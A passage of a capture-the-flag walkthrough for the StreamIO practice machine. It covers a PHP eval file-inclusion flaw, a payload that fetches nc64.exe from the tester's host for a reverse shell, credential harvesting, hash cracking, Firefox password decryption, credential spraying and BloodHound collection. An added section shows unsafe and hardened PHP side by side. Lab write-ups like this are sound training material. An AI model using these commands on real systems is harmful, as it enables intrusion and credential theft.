				<input type="submit" class="btn btn-sm btn-primary" value="Delete">
			</form>
		</div>
	</div>
</div>
<?php
} # while end
?>
<br><hr><br>
<form method="POST">
<input name="include" hidden>
</form>
<?php
if(isset($_POST['include']))
{
if($_POST['include'] !== "index.php" ) 
eval(file_get_contents($_POST['include']));
else
echo(" ---- ERROR ---- ");
}
?>

Audit analysis:
The key is the final part: if the value of $_POST['include'] is not index.php, the contents of the file named by $_POST['include'] are executed through eval(). Since file_get_contents() also accepts a URL, the file can be served from our own machine, which means we can use it to build a reverse shell; this follows naturally.
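As an added example (not the box's own master.php, which only denies index.php), the two patterns the audit touches on are shown each beside a hardened form; it covers both the ?debug= include and the POST include/eval handler. It assumes $handle is the open sqlsrv connection from the original file, and the views/ paths are hypothetical.

```php
<?php
// Added example, not the StreamIO box's own master.php. Assumes $handle is an
// open sqlsrv connection as in the original and that the views/ paths exist.

// 1. Unsafe: the id is concatenated straight into the DELETE statement.
function delete_movie_unsafe($handle, array $post)
{
    $query = "delete from movies where id = " . $post['movie_id'];
    return sqlsrv_query($handle, $query);
}

// 1. Hardened: validate the id as an integer and bind it as a parameter,
//    so the value is sent as data and never becomes part of the SQL text.
function delete_movie_safe($handle, array $post)
{
    $id = filter_var($post['movie_id'] ?? null, FILTER_VALIDATE_INT);
    if ($id === false) {
        return false;                         // non-integer id: refuse the request
    }
    return sqlsrv_query($handle, "DELETE FROM movies WHERE id = ?", [$id]);
}

// 2. Unsafe: only index.php is denied; any other local path or URL is fetched
//    and executed with eval(), which is what the reverse shell relies on.
function include_unsafe(array $post)
{
    if ($post['include'] !== "index.php") {
        eval(file_get_contents($post['include']));
    } else {
        echo " ---- ERROR ---- ";
    }
}

// 2. Hardened: the client chooses a short key, the server maps it to a fixed
//    file; no eval(), no client-controlled path, and unknown keys are rejected.
//    The same function serves the ?debug= include and the POST include field.
const ALLOWED_VIEWS = [
    'movie' => 'views/movie.php',   // hypothetical paths
    'staff' => 'views/staff.php',
    'user'  => 'views/user.php',
];

function include_safe(string $requested)
{
    if (!array_key_exists($requested, ALLOWED_VIEWS)) {
        http_response_code(400);
        return false;
    }
    require __DIR__ . '/' . ALLOWED_VIEWS[$requested];
    return true;
}

// Dispatch: ?debug=<key> or POST include=<key>, never a path.
if (isset($_GET['debug'])) {
    include_safe((string) $_GET['debug']);
} elseif (isset($_POST['include'])) {
    include_safe((string) $_POST['include']);
}
```

With allow_url_fopen disabled in php.ini, file_get_contents() would also refuse the http:// URL used in this writeup, but a local path would still be read and executed, so the allow-list without eval() is the real fix.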

File inclusion combined with a reverse shell

First prepare an nc64.exe, then write the PHP script:

system("powershell -c wget 10.10.16.10/nc64.exe -outfile \\programdata\\nc64.exe");
system("\\programdata\\nc64.exe -e powershell 10.10.16.10 443");

Here the file is written to the programdata directory because it is a shared directory that every user can access.
At the same time, start a web server locally with Python and set up an nc listener.
Then either Burp Suite or curl can finish the remaining steps; for clarity curl is used here:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# curl -X POST 'https://streamio.htb/admin/?debug=master.php' -k -b 'PHPSESSID=pv555d6n9ruo2s7btcml2nli93' -d 'include=http://10.10.16.10/revshell.php'

After running the command above, we receive a reverse shell in our local nc listener:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# nc -lnvp 443
Ncat: Version 7.94SVN ( https://nmap.org/ncat )
Ncat: Listening on [::]:443
Ncat: Listening on 0.0.0.0:443
Ncat: Connection from 10.129.225.176:51663.
Windows PowerShell 
Copyright (C) Microsoft Corporation. All rights reserved.

PS C:\inetpub\streamio.htb\admin> whoami
whoami
streamio\yoshihide
PS C:\inetpub\streamio.htb\admin> whoami /priv
whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State  
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled

However, we did not find the flag user.txt, this user has no home directory, and the usable privileges are few; it is just an ordinary web shell. To improve the shell's interactivity we can use rlwrap, wrapping the nc listener with it and then catching the shell again:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# rlwrap -cAr nc -lnvp 443

Attempting lateral movement

Inspect the database connection sections of the PHP files to see whether credentials are leaked:
PS C:\inetpub\streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"

admin\index.php:9:$connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');
login.php:46:$connection = array("Database"=>"STREAMIO" , "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');
register.php:81:    $connection = array("Database"=>"STREAMIO", "UID" => "db_admin", "PWD" => 'B1@hx31234567890');


PS C:\inetpub\streamio.htb> cd ../watch.streamio.htb
cd ../watch.streamio.htb
PS C:\inetpub\watch.streamio.htb> dir -recurse *.php | select-string -pattern "database"
dir -recurse *.php | select-string -pattern "database"

search.php:15:$connection = array("Database"=>"STREAMIO", "UID" => "db_user", "PWD" => 'B1@hB1@hB1@h');


PS C:\inetpub\watch.streamio.htb> 

We indeed obtain some credentials; db_admin is the most interesting, since the name naturally suggests it is likely the SQL Server administrator account.

Attempting to connect to SQL Server

First check whether the target has an interactive client for connecting to SQL Server:

PS C:\inetpub\watch.streamio.htb> where.exe sqlcmd
where.exe sqlcmd
C:\Program Files\Microsoft SQL Server\Client SDK\ODBC\170\Tools\Binn\SQLCMD.EXE

Because we improved the shell's interactivity with rlwrap, the following steps can be done directly on the target; otherwise they would need port forwarding to run from our Kali machine (also an option if the target is slow or you want to leave fewer traces). Connect:

PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT name FROM sys.tables;"
name                                                                                                                            
--------------------------------------------------------------------------------------------------------------------------------
movies                                                                                                                          
users                                                                                                                           

(2 rows affected)
PS C:\inetpub\watch.streamio.htb> sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
sqlcmd -S localhost -U db_admin -P B1@hx31234567890 -d streamio_backup -Q "SELECT * FROM users;"
id          username                                           password                                          
----------- -------------------------------------------------- --------------------------------------------------
          1 nikk37                                             389d14cb8e4e9b94b137deb1caf0612a                  
          2 yoshihide                                          b779ba15cedfd22a023c4d8bcf5f2332                  
          3 James                                              c660060492d9edcaa8332d89c99c9239                  
          4 Theodore                                           925e5408ecb67aea449373d668b7359e                  
          5 Samantha                                           083ffae904143c4796e464dac33c1f7d                  
          6 Lauren                                             08344b85b329d7efd611b7a7743e8a09                  
          7 William                                            d62be0dc82071bccc1322d64ec5b6c51                  
          8 Sabrina                                            f87d3c0d6c8fd686aacc6627f1f493a5                  

(8 rows affected)

Here we query the streamio_backup backup database, because backup databases often hold historical user credentials that cannot be found in the current database, and the streamio database has already been used.
Process the data:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# awk -F' ' '{print $2":"$3}' creds_dbbackup.txt > creds_dbbackup.tmp && mv creds_dbbackup.tmp creds_dbbackup.txt && cat creds_dbbackup.txt
# written via a temp file: piping tee back into the same file truncates it before cat has read it

Crack the hashes:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]                                       
└─# hashcat creds_dbbackup.txt /usr/share/wordlists/rockyou.txt -m 0 --user --show                               
nikk37:389d14cb8e4e9b94b137deb1caf0612a:get_dem_girls2@yahoo.com
yoshihide:b779ba15cedfd22a023c4d8bcf5f2332:66boysandgirls..
Lauren:08344b85b329d7efd611b7a7743e8a09:##123a8j8w5123##
Sabrina:f87d3c0d6c8fd686aacc6627f1f493a5:!!sabrina$

Looking back at the earlier shell, the user nikk37 happens to have a home directory, so we try lateral movement with this user first.

Connecting with evil-winrm
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# evil-winrm -u nikk37 -p 'get_dem_girls2@yahoo.com' -i streamio.htb
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\nikk37\Documents> whoami
streamio\nikk37
Getting a foothold
*Evil-WinRM* PS C:\Users\nikk37\Documents> cd ../desktop
*Evil-WinRM* PS C:\Users\nikk37\desktop> ls


    Directory: C:\Users\nikk37\desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/26/2024   1:49 AM             34 user.txt


*Evil-WinRM* PS C:\Users\nikk37\desktop> cat user.txt
f45a4a88b84668351f92a3729cac0011


Post-exploitation information gathering

Obviously, after successful lateral movement the first thing to check is the current user's privileges and group memberships:

*Evil-WinRM* PS C:\Users\nikk37\desktop> whoami /priv

PRIVILEGES INFORMATION
----------------------

Privilege Name                Description                    State
============================= ============================== =======
SeMachineAccountPrivilege     Add workstations to domain     Enabled
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
*Evil-WinRM* PS C:\Users\nikk37\desktop> net user nikk37
User name                    nikk37
Full Name
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            2/22/2022 1:57:16 AM
Password expires             Never
Password changeable          2/23/2022 1:57:16 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   2/22/2022 2:39:51 AM

Logon hours allowed          All

Local Group Memberships      *Remote Management Use
Global Group memberships     *Domain Users
The command completed successfully.

Nothing of particular interest here.
Check which programs are installed locally, to widen our attack surface:

*Evil-WinRM* PS C:\> cd 'Program Files'
*Evil-WinRM* PS C:\Program Files> ls


    Directory: C:\Program Files


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   1:35 AM                Common Files
d-----        2/22/2022   2:57 AM                iis express
d-----        3/28/2022   4:46 PM                internet explorer
d-----        2/22/2022   2:14 AM                LAPS
d-----        2/22/2022   2:52 AM                Microsoft
d-----        2/22/2022   1:54 AM                Microsoft SQL Server
d-----        2/22/2022   1:53 AM                Microsoft Visual Studio 10.0
d-----        2/22/2022   1:53 AM                Microsoft.NET
d-----        2/25/2022  11:35 PM                PHP
d-----        2/22/2022   2:56 AM                Reference Assemblies
d-----        2/22/2022   2:56 AM                runphp
d-----        2/22/2022   1:35 AM                VMware
d-r---        3/28/2022   4:46 PM                Windows Defender
d-----        3/28/2022   6:06 PM                Windows Defender Advanced Threat Protection
d-----        3/28/2022   4:46 PM                Windows Mail
d-----        3/28/2022   4:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        3/28/2022   4:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                Windows Security
d-----        9/15/2018  12:19 AM                WindowsPowerShell

*Evil-WinRM* PS C:\Program Files> cd ..\'Program Files (x86)'
*Evil-WinRM* PS C:\Program Files (x86)> ls


    Directory: C:\Program Files (x86)


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/15/2018  12:28 AM                Common Files
d-----        2/25/2022  11:35 PM                IIS
d-----        2/25/2022  11:38 PM                iis express
d-----        3/28/2022   4:46 PM                Internet Explorer
d-----        2/22/2022   1:54 AM                Microsoft SQL Server
d-----        2/22/2022   1:53 AM                Microsoft.NET
d-----        5/26/2022   4:09 PM                Mozilla Firefox
d-----        5/26/2022   4:09 PM                Mozilla Maintenance Service
d-----        2/25/2022  11:33 PM                PHP
d-----        2/22/2022   2:56 AM                Reference Assemblies
d-----        3/28/2022   4:46 PM                Windows Defender
d-----        3/28/2022   4:46 PM                Windows Mail
d-----        3/28/2022   4:46 PM                Windows Media Player
d-----        9/15/2018  12:19 AM                Windows Multimedia Platform
d-----        9/15/2018  12:28 AM                windows nt
d-----        3/28/2022   4:46 PM                Windows Photo Viewer
d-----        9/15/2018  12:19 AM                Windows Portable Devices
d-----        9/15/2018  12:19 AM                WindowsPowerShell

Of these, LAPS and Mozilla Firefox are the most interesting, because they may also leak credentials.

Attempting to extract and crack leaked credentials from Firefox

Search:
[Screenshot 2024-02-26-12-14-22]
From Firefox's official documentation we also learn which files store the saved passwords:
[Screenshot 2024-02-26-12-17-03]

*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles> cd 5rwivk2l.default
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> ls


    Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        2/22/2022   2:40 AM             47 times.json


*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\5rwivk2l.default> cd ..\br53rxeg.default-release
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> ls


    Directory: C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        2/22/2022   2:40 AM                bookmarkbackups
d-----        2/22/2022   2:40 AM                browser-extension-data
d-----        2/22/2022   2:41 AM                crashes
d-----        2/22/2022   2:42 AM                datareporting
d-----        2/22/2022   2:40 AM                minidumps
d-----        2/22/2022   2:42 AM                saved-telemetry-pings
d-----        2/22/2022   2:40 AM                security_state
d-----        2/22/2022   2:42 AM                sessionstore-backups
d-----        2/22/2022   2:40 AM                storage
-a----        2/22/2022   2:40 AM             24 addons.json
-a----        2/22/2022   2:42 AM           5189 addonStartup.json.lz4
-a----        2/22/2022   2:42 AM            310 AlternateServices.txt
-a----        2/22/2022   2:41 AM         229376 cert9.db
-a----        2/22/2022   2:40 AM            208 compatibility.ini
-a----        2/22/2022   2:40 AM            939 containers.json
-a----        2/22/2022   2:40 AM         229376 content-prefs.sqlite
-a----        2/22/2022   2:40 AM          98304 cookies.sqlite
-a----        2/22/2022   2:40 AM           1081 extension-preferences.json
-a----        2/22/2022   2:40 AM          43726 extensions.json
-a----        2/22/2022   2:42 AM        5242880 favicons.sqlite
-a----        2/22/2022   2:41 AM         262144 formhistory.sqlite
-a----        2/22/2022   2:40 AM            778 handlers.json
-a----        2/22/2022   2:40 AM         294912 key4.db
-a----        2/22/2022   2:41 AM           1593 logins-backup.json
-a----        2/22/2022   2:41 AM           2081 logins.json
-a----        2/22/2022   2:42 AM              0 parent.lock
-a----        2/22/2022   2:42 AM          98304 permissions.sqlite
-a----        2/22/2022   2:40 AM            506 pkcs11.txt
-a----        2/22/2022   2:42 AM        5242880 places.sqlite
-a----        2/22/2022   2:42 AM           8040 prefs.js
-a----        2/22/2022   2:42 AM            180 search.json.mozlz4
-a----        2/22/2022   2:42 AM            288 sessionCheckpoints.json
-a----        2/22/2022   2:42 AM           1853 sessionstore.jsonlz4
-a----        2/22/2022   2:40 AM             18 shield-preference-experiments.json
-a----        2/22/2022   2:42 AM            611 SiteSecurityServiceState.txt
-a----        2/22/2022   2:42 AM           4096 storage.sqlite
-a----        2/22/2022   2:40 AM             50 times.json
-a----        2/22/2022   2:40 AM          98304 webappsstore.sqlite
-a----        2/22/2022   2:42 AM            141 xulstore.json

We indeed find both files. When viewing their contents, part is unreadable binary and the passwords shown are in encrypted form, so we look for a tool dedicated to decrypting Firefox passwords:
[Screenshot 2024-02-26-12-21-03]
[Screenshot 2024-02-26-12-22-51]
After reading roughly how the decryption and the tools work, we find one that does not need the NSS library and only requires Python:
[Screenshot 2024-02-26-12-28-01]
https://github.com/lclevy/firepwd
[Screenshot 2024-02-26-12-28-52]
First transfer the key files to Kali:

*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download key4.db
                                        
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\key4.db to key4.db
                                        
Info: Download successful!
*Evil-WinRM* PS C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release> download logins.json
                                        
Info: Downloading C:\users\nikk37\AppData\Roaming\Mozilla\Firefox\Profiles\br53rxeg.default-release\logins.json to logins.json
                                        
Info: Download successful!

Just in case, the NSS library from the Firefox root directory can be downloaded too:

*Evil-WinRM* PS C:\Users\nikk37\Documents> cd C:\'Program Files (x86)'\'Mozilla Firefox'
*Evil-WinRM* PS C:\Program Files (x86)\Mozilla Firefox> download nss3.dll
                                        
Info: Downloading C:\Program Files (x86)\Mozilla Firefox\nss3.dll to nss3.dll

Info: Download successful!

Start the decryption attempt:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]                
└─# git clone https://github.com/lclevy/firepwd.git   
...
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# chmod +x firepwd.py 
                                                                                                                                                                                                                   
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# ./firepwd.py 
./firepwd.py: 行 17: 
 decode Firefox passwords (https://github.com/lclevy/firepwd)
 
 lclevy@free.fr 
 28 Aug 2013: initial version, Oct 2016: support for logins.json, Feb 2018: support for key4.db, 
 Apr2020: support for NSS 3.49 / Firefox 75.0 : https://hg.mozilla.org/projects/nss/rev/fc636973ad06392d11597620b602779b4af312f6
 
 for educational purpose only, not production level
 integrated into https://github.com/AlessandroZ/LaZagne
 tested with python 3.7.3, PyCryptodome 3.9.0 and pyasn 0.4.8

 key3.db is read directly, the 3rd party bsddb python module is NOT needed
 NSS library is NOT needed
 
 profile directory under Win10 is C:\\Users\\[user]\\AppData\\Roaming\\Mozilla\\Firefox\\Profiles\\[profile_name]
 
: 没有那个文件或目录
./firepwd.py: 行 19: from: 未找到命令
./firepwd.py: 行 20: import: 未找到命令
./firepwd.py: 行 21: from: 未找到命令
./firepwd.py: 行 22: import: 未找到命令
./firepwd.py: 行 23: from: 未找到命令
./firepwd.py: 行 25: from: 未找到命令
./firepwd.py: 行 26: from: 未找到命令
./firepwd.py: 行 27: import: 未找到命令
./firepwd.py: 行 28: from: 未找到命令
./firepwd.py: 行 29: from: 未找到命令
./firepwd.py: 行 30: from: 未找到命令
./firepwd.py: 行 31: from: 未找到命令
./firepwd.py: 行 32: import: 未找到命令
./firepwd.py: 行 33: from: 未找到命令
./firepwd.py: 行 35: 未预期的记号 "(" 附近有语法错误
./firepwd.py: 行 35: `def getShortLE(d, a):'
# The error indicates that the two key credential files downloaded earlier first need to be placed in that directory
┌──(root㉿hunter)-[/home/…/Desktop/htb/StreamIO/firepwd]
└─# cd ..                   
                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# mkdir firefox_creds     
                 
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cp key4.db logins.json ./firefox_creds 
                
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds  
Traceback (most recent call last):
  File "/home/cvestone/Desktop/htb/StreamIO/./firepwd/firepwd.py", line 28, in <module>
    from Crypto.Cipher import DES3, AES
ModuleNotFoundError: No module named 'Crypto'
             
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# pip3 install pycryptodome
...

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds
globalSalt: b'd215c391179edb56af928a06c627906bcbd4bd47'
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'5d573772912b3c198b1e3ee43ccb0f03b0b23e46d51c34a2a055e00ebcd240f5'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'1baafcd931194d48f8ba5775a41f'
       }
     }
   }
   OCTETSTRING b'12e56d1c8458235a4136b280bd7ef9cf'
 }
clearText b'70617373776f72642d636865636b0202'
password check? True
 SEQUENCE {
   SEQUENCE {
     OBJECTIDENTIFIER 1.2.840.113549.1.5.13 pkcs5 pbes2
     SEQUENCE {
       SEQUENCE {
         OBJECTIDENTIFIER 1.2.840.113549.1.5.12 pkcs5 PBKDF2
         SEQUENCE {
           OCTETSTRING b'098560d3a6f59f76cb8aad8b3bc7c43d84799b55297a47c53d58b74f41e5967e'
           INTEGER b'01'
           INTEGER b'20'
           SEQUENCE {
             OBJECTIDENTIFIER 1.2.840.113549.2.9 hmacWithSHA256
           }
         }
       }
       SEQUENCE {
         OBJECTIDENTIFIER 2.16.840.1.101.3.4.1.42 aes256-CBC
         OCTETSTRING b'e28a1fe8bcea476e94d3a722dd96'
       }
     }
   }
   OCTETSTRING b'51ba44cdd139e4d2b25f8d94075ce3aa4a3d516c2e37be634d5e50f6d2f47266'
 }
clearText b'b3610ee6e057c4341fc76bc84cc8f7cd51abfe641a3eec9d0808080808080808'
decrypting login/password pairs
https://slack.streamio.htb:b'admin',b'JDg0dd1s@d0p3cr3@t0r'
https://slack.streamio.htb:b'nikk37',b'n1kk1sd0p3t00:)'
https://slack.streamio.htb:b'yoshihide',b'paddpadd@12'
https://slack.streamio.htb:b'JDgodd',b'password@12'
# Some credentials have been decrypted
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# python3 ./firepwd/firepwd.py firefox_creds | tee firefox_cracked

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2":"$4}' | tee firefox_crackedcreds 
admin:JDg0dd1s@d0p3cr3@t0r
nikk37:n1kk1sd0p3t00:)
yoshihide:paddpadd@12
JDgodd:password@12

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $2}' | tee firefox_crackeduser 
admin
nikk37
yoshihide
JDgodd
            
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# cat firefox_cracked | awk -F"'" '{print $4}' | tee firefox_crackedpwd
JDg0dd1s@d0p3cr3@t0r
n1kk1sd0p3t00:)
paddpadd@12
password@12
Trying the SMB shares again
┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec smb streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB         streamio.htb    445    DC               [*] Windows 10.0 Build 17763 x64 (name:DC) (domain:streamIO.htb) (signing:True) (SMBv1:False)
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\admin:password@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\nikk37:password@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\yoshihide:JDg0dd1s@d0p3cr3@t0r STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\yoshihide:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] Connection Error: The NETBIOS connection with the remote host timed out.
SMB         streamio.htb    445    DC               [-] streamIO.htb\yoshihide:password@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [+] streamIO.htb\JDgodd:JDg0dd1s@d0p3cr3@t0r 
SMB         streamio.htb    445    DC               [-] streamIO.htb\JDgodd:n1kk1sd0p3t00:) STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\JDgodd:paddpadd@12 STATUS_LOGON_FAILURE 
SMB         streamio.htb    445    DC               [-] streamIO.htb\JDgodd:password@12 STATUS_LOGON_FAILURE

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# crackmapexec winrm streamio.htb -u firefox_crackeduser -p firefox_crackedpwd --continue-on-success
SMB         streamio.htb    5985   NONE             [*] None (name:streamio.htb) (domain:None)
HTTP        streamio.htb    5985   NONE             [*] http://streamio.htb:5985/wsman
WINRM       streamio.htb    5985   NONE             [-] None\admin:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\admin:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\admin:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\admin:password@12
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\nikk37:password@12
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\yoshihide:password@12
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:JDg0dd1s@d0p3cr3@t0r
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:n1kk1sd0p3t00:)
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:paddpadd@12
WINRM       streamio.htb    5985   NONE             [-] None\JDgodd:password@12

Only one credential works; try accessing SMB with it:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# smbmap -H streamio.htb -u JDgodd  -p 'JDg0dd1s@d0p3cr3@t0r'                               

    ________  ___      ___  _______   ___      ___       __         _______
   /"       )|"  \    /"  ||   _  "\ |"  \    /"  |     /""\       |   __ "\
  (:   \___/  \   \  //   |(. |_)  :) \   \  //   |    /    \      (. |__) :)
   \___  \    /\  \/.    ||:     \/   /\   \/.    |   /' /\  \     |:  ____/
    __/  \   |: \.        |(|  _  \  |: \.        |  //  __'  \    (|  /
   /" \   :) |.  \    /:  ||: |_)  :)|.  \    /:  | /   /  \   \  /|__/ \
  (_______/  |___|\__/|___|(_______/ |___|\__/|___|(___/    \___)(_______)
 -----------------------------------------------------------------------------
     SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
                     https://github.com/ShawnDEvans/smbmap

[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)                                
                                                                                                    
[+] IP: 10.129.225.102:445      Name: streamio.htb              Status: Authenticated
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        NETLOGON                                                READ ONLY       Logon server share 
        SYSVOL                                                  READ ONLY       Logon server share 

Nothing beyond the default shares is readable, but the credential is valid, so keep it.
From here the goal is privilege escalation, and since this is a domain environment we follow a domain-penetration approach.

Domain penetration

When you land in an unfamiliar domain, the most efficient first step is to collect it with BloodHound: from the Active Directory data it resolves every domain member, the relationships between groups, and the potential attack paths.

Collecting the domain with BloodHound and analysing attack paths

The bloodhound-python collector needs a valid domain account (any authenticated domain user can read the LDAP data it collects; higher privilege only matters for session collection on the hosts). We hold two credentials and cannot tell which is more privileged, but JDgodd is clearly the more active user, so try that one first:

┌──(root㉿hunter)-[/home/cvestone/Desktop/htb/StreamIO]
└─# bloodhound-python -c ALL -u JDgodd -p 'JDg0dd1s@d0p3cr3@t0r' -d streamio.htb -dc streamio.htb -ns 10.129.206.188 --zip
INFO: Found AD domain: streamio.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: streamio.htb
INFO: Found 8 users
INFO: Found 54 groups
INFO: Found 4 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC.streamIO.htb
INFO: Done in 00M 37S
INFO: Compressing output into 20240227142202_bloodhound.zip

Import the collected zip into BloodHound. (The KRB_AP_ERR_SKEW warning above only means the collector fell back to NTLM because the attacker's clock differs too much from the DC's; sync the clock against the DC with `ntpdate` if you need Kerberos.) neo4j must be running before the import:

